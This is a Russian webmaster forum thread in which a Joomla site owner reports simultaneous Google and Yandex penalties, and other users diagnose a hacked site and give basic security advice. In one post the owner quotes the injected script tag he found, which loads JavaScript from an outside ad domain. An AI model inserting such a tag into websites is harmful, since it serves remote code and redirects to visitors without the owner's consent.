Одновременный бан в Гугле и Яндексе в один день

12
S
На сайте с 21.07.2014
Offline
11
1558

Здравствуйте!

У меня такая проблема ... напишу сначала предисловие что было.

Решил я скопировать файлы с хостинга таймвеба к себе на компьютер, чтобы в случае чего можно было бы перезалить его туда в более позднем виде. Для этого я скачал файлзилу и скачал public_html к себе на компьютер. Также я зачем-то пытался удалить bash_history, но не получилось.

(Ссылки не покупаю, текст мой, за пол года до этого вышел я с фильтра Яндекса понижающий позиции. Сайт на Джумле.)

После скачки файлов, а это было вечером в этот четверг, в пятницу уже посещалка снизилась с ~ 1500 до 400, а сегодня в субботу, из индекса Гула пропали ВСЕ страницы, а Яндекс пессимизировал мои страницы, осталась посещалка только с Яндекса около 100 человек. Апдейт Яши еще не было. В вебмастере гугла написано в разделе "Меры принятые вручную"

Некоторые меры, принятые вручную, действуют в отношении всего сайта
Причина

Маскировка и/или скрытая переадресация
На страницах этого сайта обнаружены признаки маскировки (пользователям показывается не то содержание, которое видят поисковые роботы) или переадресации пользователей на другую страницу, которая недоступна для роботов. Подробнее...

Сегодня сделал откат файлов с хостинга, хостинг делает откат за три дня до этого действия, значит откат будет действовать до предположительного моего "взлома или еще чего там". Также поменял пароль на хостинге.

Вопрос: Что с моим сайтом, и как так получилось что Я и Г одновременно наложили на мой сайт фильтры????????????

S
На сайте с 21.07.2014
Offline
11
#1

Так друзья, еще я обнаружил ,что на мой сайт 7 декабря была поставлена ссылка http://KissMyAds.click Кто что-нибудь знает про этих хакеров ***????????

---------- Добавлено 13.12.2015 в 00:08 ----------

во такой скрипт <script type="text/javascript" src="http://kissmyads.click/QSKuwb_l?m=js"></script>

U5
На сайте с 07.12.2015
Offline
5
#2

видимо через уязвимость в джумле сделали. у нас было что-то вроде этого, только через cgi

xtras
На сайте с 03.12.2013
Offline
342
#3

Скорей всего сайт взломали, скачивание тут не при чем и просто совпало по времени.

Чтобы избежать подобных проблем, старайтесь выполнять всего несколько очень простых правил:

1. Не храните пароли в фтп-клиенте, браузере и т.п.

2. Не делайте слишком простые пароли в виде слов, используйте комбинации букв/символов.

3. Используйте расширения только из проверенных источников (в вашем случае это JED). Если расширение платное, удержитесь от соблазна скачать его даром на какой-нибудь варезной помойке, лучше купите у разработчика, стоят они копейки.

4. Регулярно обновляйте версию cms.

5. Используйте расширения для предотвращения наиболее распространенных способов взлома.

6. Выставляйте права на файлы и папки в соответствии с рекомендуемыми.

На джумлафоруме есть большой раздел посвященный безопасности сайтов на Joomla.

install
На сайте с 20.02.2011
Offline
143
#4

Совпало просто. Ломанули сайт, залили каку.

Ищите и удаляйе код, латайте дыры в движке, меняйте пароли.

Затем пишите гуглу, было то-то и то-то, сделал это и это.

И все вернется обратно. Так же и в яндексе вернется, писать ему не надо.

Лей Бурж Сюда (https://clck.ru/9of9G) VPS/VDS. Бесплатное администрирование 24/7 (http://goo.gl/kmKpNi)
S
На сайте с 21.07.2014
Offline
11
#5
xtras:

На джумлафоруме есть большой раздел посвященный безопасности сайтов на Joomla.

Я там тоже написал, один из ответчиков с того форума назвал мой шаблон сайта, через который скорее всего был взломан сайт. Я название этого шаблона нигде не упоминал. Вот как он смог назвать этот шаблон?

S
На сайте с 09.11.2015
Offline
35
#6
Silka:
Я там тоже написал, один из ответчиков с того форума назвал мой шаблон сайта, через который скорее всего был взломан сайт. Я название этого шаблона нигде не упоминал. Вот как он смог назвать этот шаблон?

Пути к стилям CSS например указывают что за шаблон

Maxim-KL
На сайте с 26.01.2011
Offline
350
#7

Silka, Гадать здесь можно очень долго, давайте урл сайта и посмотрим. А так это просто банальное Вангование.

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
S
На сайте с 21.07.2014
Offline
11
#8
seonomad:
Пути к стилям CSS например указывают что за шаблон

Так я свой сайт никому не показывал.

O1
На сайте с 08.08.2015
Offline
14
#9

У меня кстати тоже самое получилось, сегодня код этот нашел у себя.

S
На сайте с 21.07.2014
Offline
11
#10
oteli1304:
У меня кстати тоже самое получилось, сегодня код этот нашел у себя.

А ну как расскажи по подробней? что за шаблон у тебя, кмс какая?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий